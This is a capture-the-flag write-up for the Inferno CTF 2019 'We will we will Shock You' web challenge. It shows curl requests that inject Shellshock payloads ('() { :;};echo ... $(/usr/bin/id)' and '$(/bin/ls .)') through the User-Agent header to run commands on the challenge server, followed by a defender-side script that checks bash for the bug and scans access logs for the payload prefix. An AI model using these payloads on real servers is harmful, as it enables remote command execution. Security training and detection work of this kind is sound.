Tags: web shellshock 

Rating: 5.0

# Inferno CTF 2019 – We will we will Shock You

* **Category:** Web
* **Points:** 150

## Challenge

> :)
>
> http://104.197.168.32:17012/index.html

## Solution

The name of the challenge recalls the [*Shellshock*](https://en.wikipedia.org/wiki/Shellshock_(software_bug)) vulnerability.

The homepage looks like an Apache2 default index page, but inspecting the HTML source reveals an interesting comment.

```html

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Apache2 Debian Default Page: It works</title>
<style type="text/css" media="screen">
* {
margin: 0px 0px 0px 0px;
padding: 0px 0px 0px 0px;
}

body, html {
padding: 3px 3px 3px 3px;

background-color: #D8DBE2;

font-family: Verdana, sans-serif;
font-size: 11pt;
text-align: center;
}

div.main_page {
position: relative;
display: table;

width: 800px;

margin-bottom: 3px;
margin-left: auto;
margin-right: auto;
padding: 0px 0px 0px 0px;

border-width: 2px;
border-color: #212738;
border-style: solid;

background-color: #FFFFFF;

text-align: center;
}

div.page_header {
height: 99px;
width: 100%;

background-color: #F5F6F7;
}

div.page_header span {
margin: 15px 0px 0px 50px;

font-size: 180%;
font-weight: bold;
}

div.page_header img {
margin: 3px 0px 0px 40px;

border: 0px 0px 0px;
}

div.table_of_contents {
clear: left;

min-width: 200px;

margin: 3px 3px 3px 3px;

background-color: #FFFFFF;

text-align: left;
}

div.table_of_contents_item {
clear: left;

width: 100%;

margin: 4px 0px 0px 0px;

background-color: #FFFFFF;

color: #000000;
text-align: left;
}

div.table_of_contents_item a {
margin: 6px 0px 0px 6px;
}

div.content_section {
margin: 3px 3px 3px 3px;

background-color: #FFFFFF;

text-align: left;
}

div.content_section_text {
padding: 4px 8px 4px 8px;

color: #000000;
font-size: 100%;
}

div.content_section_text pre {
margin: 8px 0px 8px 0px;
padding: 8px 8px 8px 8px;

border-width: 1px;
border-style: dotted;
border-color: #000000;

background-color: #F5F6F7;

font-style: italic;
}

div.content_section_text p {
margin-bottom: 6px;
}

div.content_section_text ul, div.content_section_text li {
padding: 4px 8px 4px 16px;
}

div.section_header {
padding: 3px 6px 3px 6px;

background-color: #8E9CB2;

color: #FFFFFF;
font-weight: bold;
font-size: 112%;
text-align: center;
}

div.section_header_red {
background-color: #CD214F;
}

div.section_header_grey {
background-color: #9F9386;
}

.floating_element {
position: relative;
float: left;
}

div.table_of_contents_item a,
div.content_section_text a {
text-decoration: none;
font-weight: bold;
}

div.table_of_contents_item a:link,
div.table_of_contents_item a:visited,
div.table_of_contents_item a:active {
color: #000000;
}

div.table_of_contents_item a:hover {
background-color: #000000;

color: #FFFFFF;
}

div.content_section_text a:link,
div.content_section_text a:visited,
div.content_section_text a:active {
background-color: #DCDFE6;

color: #000000;
}

div.content_section_text a:hover {
background-color: #000000;

color: #DCDFE6;
}

div.validator {
}
</style>
</head>
<body>
<div class="main_page">
<div class="page_header floating_element">

<span>
Apache2 Debian Default Page
</span>
</div>

<div class="content_section floating_element">

<div class="section_header section_header_red">
<div id="about"></div>
It works!
</div>
<div class="content_section_text">


This is the default welcome page used to test the correct
operation of the Apache2 server after installation on Debian systems.
If you can read this page, it means that the Apache HTTP server installed at
this site is working properly. You should replace this file (located at
<tt>/var/www/html/index.html</tt>) before continuing to operate your HTTP server.


If you are a normal user of this web site and don't know what this page is
about, this probably means that the site is currently unavailable due to
maintenance.
If the problem persists, please contact the site's administrator.

</div>
<div class="section_header">
<div id="changes"></div>
Configuration Overview
</div>
<div class="content_section_text">


Debian's Apache2 default configuration is different from the
upstream default configuration, and split into several files optimized for
interaction with Debian tools. The configuration system is
fully documented in
/usr/share/doc/apache2/README.Debian.gz
. Refer to this for the full
documentation. Documentation for the web server itself can be
found by accessing the manual if the <tt>apache2-doc</tt>
package was installed on this server.



The configuration layout for an Apache2 web server installation on Debian systems is as follows:


/etc/apache2/
|-- apache2.conf
| `-- ports.conf
|-- mods-enabled
| |-- *.load
| `-- *.conf
|-- conf-enabled
| `-- *.conf
|-- sites-enabled
| `-- *.conf



  • <tt>apache2.conf</tt> is the main configuration
    file. It puts the pieces together by including all remaining configuration
    files when starting up the web server.

  • <tt>ports.conf</tt> is always included from the
    main configuration file. It is used to determine the listening ports for
    incoming connections, and this file can be customized anytime.

  • Configuration files in the <tt>mods-enabled/</tt>,
    <tt>conf-enabled/</tt> and <tt>sites-enabled/</tt> directories contain
    particular configuration snippets which manage modules, global configuration
    fragments, or virtual host configurations, respectively.

  • They are activated by symlinking available
    configuration files from their respective
    *-available/ counterparts. These should be managed
    by using our helpers
    <tt>
    a2enmod,
    a2dismod,
    </tt>
    <tt>
    a2ensite,
    a2dissite,
    </tt>
    and
    <tt>
    a2enconf,
    a2disconf
    </tt>. See their respective man pages for detailed information.

  • The binary is called apache2. Due to the use of
    environment variables, in the default configuration, apache2 needs to be
    started/stopped with <tt>/etc/init.d/apache2</tt> or <tt>apache2ctl</tt>.
    Calling <tt>/usr/bin/apache2</tt> directly will not work with the
    default configuration.


</div>

<div class="section_header">
<div id="docroot"></div>
Document Roots
</div>

<div class="content_section_text">


By default, Debian does not allow access through the web browser to
<em>any</em> file apart of those located in <tt>/var/www</tt>,
public_html
directories (when enabled) and <tt>/usr/share</tt> (for web
applications). If your site is using a web document root
located elsewhere (such as in <tt>/srv</tt>) you may need to whitelist your
document root directory in <tt>/etc/apache2/apache2.conf</tt>.



The default Debian document root is <tt>/var/www/html</tt>. You
can make your own virtual hosts under /var/www. This is different
to previous releases which provides better security out of the box.


</div>

<div class="section_header">
<div id="bugs"></div>
Reporting Problems
</div>
<div class="content_section_text">


Please use the <tt>reportbug</tt> tool to report bugs in the
Apache2 package with Debian. However, check existing bug reports before reporting a new bug.



Please report bugs specific to modules (such as PHP and others)
to respective packages, not to the web server itself.



</div>

</div>
</div>
<div class="validator">
</div>
</body>
</html>
```

Requesting `http://104.197.168.32:17012/bashferno.cgi` returns the following output.

```html
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>BASHFerno</title>
</head>
<body>


Hello Bashers!!

</body>
</html>
```

Again, more hints pointing to *Shellshock*.

You can try to inject commands via the `User-Agent` HTTP header.

```
foo@bar:~$ curl -v 'http://104.197.168.32:17012/bashferno.cgi' -H 'User-Agent: () { :;};echo -e "\r\n$(/usr/bin/id)"'
* Trying 104.197.168.32...
* TCP_NODELAY set
* Connected to 104.197.168.32 (104.197.168.32) port 17012 (#0)
> GET /bashferno.cgi HTTP/1.1
> Host: 104.197.168.32:17012
> Accept: */*
> User-Agent: () { :;};echo -e "\r\n$(/usr/bin/id)"
>
< HTTP/1.1 200 OK
< Date: Fri, 27 Dec 2019 18:30:09 GMT
< Server: Apache/2.4.10 (Debian)
< Transfer-Encoding: chunked
<
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Content-type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>BASHFerno</title>
</head>
<body>


Hello Bashers!!

</body>
</html>
* Connection #0 to host 104.197.168.32 left intact

foo@bar:~$ curl -v 'http://104.197.168.32:17012/bashferno.cgi' -H 'User-Agent: () { :;};echo -e "\r\n$(/bin/ls .)"'
* Trying 104.197.168.32...
* TCP_NODELAY set
* Connected to 104.197.168.32 (104.197.168.32) port 17012 (#0)
> GET /bashferno.cgi HTTP/1.1
> Host: 104.197.168.32:17012
> Accept: */*
> User-Agent: () { :;};echo -e "\r\n$(/bin/ls .)"
>
< HTTP/1.1 200 OK
< Date: Fri, 27 Dec 2019 18:32:42 GMT
< Server: Apache/2.4.10 (Debian)
< Transfer-Encoding: chunked
<
bashferno.cgi
flag_for_this_INFERNO.txt
index.html
Content-type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>BASHFerno</title>
</head>
<body>


Hello Bashers!!

</body>
</html>
* Connection #0 to host 104.197.168.32 left intact
```

The `ls` payload reveals a `flag_for_this_INFERNO.txt` file, which can be downloaded directly from the following URL.
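As an added defender-side example (not part of the original writeup), the POSIX shell script below does two things: it checks whether the local `bash` still executes a command placed after an exported function definition, which is the behaviour the payloads above rely on, and it counts requests in an Apache combined-format access log whose Referer or User-Agent value starts with the `() {` prefix. The log lines are constructed for the example.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Two defender-side checks for
# the bug class this challenge is built on (a bash that parses "() {" values from
# the environment and runs whatever follows the function body).

# 1. Does the local bash still execute the command after an exported function?
#    Returns 0 if "echo vulnerable" ran (unpatched bash), 1 otherwise.
bash_runs_trailing_command() {
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo test' 2>/dev/null)
    case "$out" in
        *vulnerable*) return 0 ;;
        *)            return 1 ;;
    esac
}

# 2. Count requests in an Apache "combined" access log whose Referer or
#    User-Agent field (the two quoted header values at the end of each line)
#    starts with the Shellshock function-definition prefix "() {".
#    Reads log lines on stdin and prints the number of hits.
shellshock_hits() {
    # The leading quote anchors the match to the start of a logged header value;
    # "() *{" tolerates the optional space bash accepts between "()" and "{".
    n=$(grep -c '"() *{' || true)
    printf '%s\n' "$n"
}

# Constructed sample log (not taken from the challenge server) in combined format:
# two requests carry the payload shape seen above, one is ordinary traffic.
SAMPLE_LOG='10.0.0.5 - - [27/Dec/2019:18:30:09 +0000] "GET /bashferno.cgi HTTP/1.1" 200 312 "-" "() { :;};echo -e \"\r\n$(/usr/bin/id)\""
10.0.0.6 - - [27/Dec/2019:18:31:00 +0000] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
10.0.0.7 - - [27/Dec/2019:18:32:42 +0000] "GET /bashferno.cgi HTTP/1.1" 200 312 "-" "() { :;};echo -e \"\r\n$(/bin/ls .)\""'

if bash_runs_trailing_command; then
    echo "local bash: executes trailing commands from the environment (unpatched)"
else
    echo "local bash: ignores trailing commands (patched, or bash not installed)"
fi
printf 'shellshock hits in sample log: %s\n' "$(printf '%s\n' "$SAMPLE_LOG" | shellshock_hits)"
```

Only headers that the `LogFormat` actually records can be scanned this way; the default combined format keeps Referer and User-Agent, while other headers a CGI script exports into the environment would need a custom `LogFormat` or a request-level filter.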

```
http://104.197.168.32:17012/flag_for_this_INFERNO.txt
```

The file contains the flag.

```
infernoCTF{F33l_Th3_Sh0ck}
```

[Original writeup](https://github.com/m3ssap0/CTF-Writeups/blob/master/Inferno%20CTF%202019/We%20will%20we%20will%20Shock%20You/README.md).